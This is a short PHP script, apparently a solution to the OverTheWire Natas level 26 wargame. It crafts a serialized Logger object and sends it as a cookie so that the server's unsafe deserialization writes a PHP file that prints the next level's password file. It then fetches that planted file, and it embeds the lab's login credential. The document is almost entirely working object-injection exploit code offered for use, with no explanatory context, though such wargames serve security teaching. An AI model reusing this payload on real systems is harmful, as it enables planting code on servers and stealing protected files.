<?php $filename = "4864".".php"; class Logger{ private $logFile; private $initMsg; private $exitMsg; function __construct($exitMsg){ global $filename; // initialise variables $this->initMsg="#-- started--#\n"; $this->exitMsg=$exitMsg; /*$this->exitMsg='';*/ $this->logFile = $filename; // write initial message } function log($msg){ } function __destruct(){ // write exit message } } $greet = function() {}; $msg = array('<','?','php ','echo file_get_contents("/etc/natas_webpass/natas27");',''); foreach( $msg as $m) { $obj = new Logger($m); $func = base64_encode(serialize($obj)); print "<br><br>".$m."<br>".$func; $c = curl_init("http://natas26.natas.labs.overthewire.org/"); curl_setopt($c, CURLOPT_USERPWD, "natas26:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T"); curl_setopt($c, CURLOPT_COOKIE, 'drawing='.$func.''); curl_easy_setopt($c, CURLOPT_WRITEFUNCTION, $greet); $page = curl_exec($c); curl_close($c); } $c = curl_init('http://natas26.natas.labs.overthewire.org/img/'.$filename); curl_setopt($c, CURLOPT_USERPWD, "natas26:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T"); $page = curl_exec($c); curl_close($c);
You have javascript disabled. You will not be able to edit any code.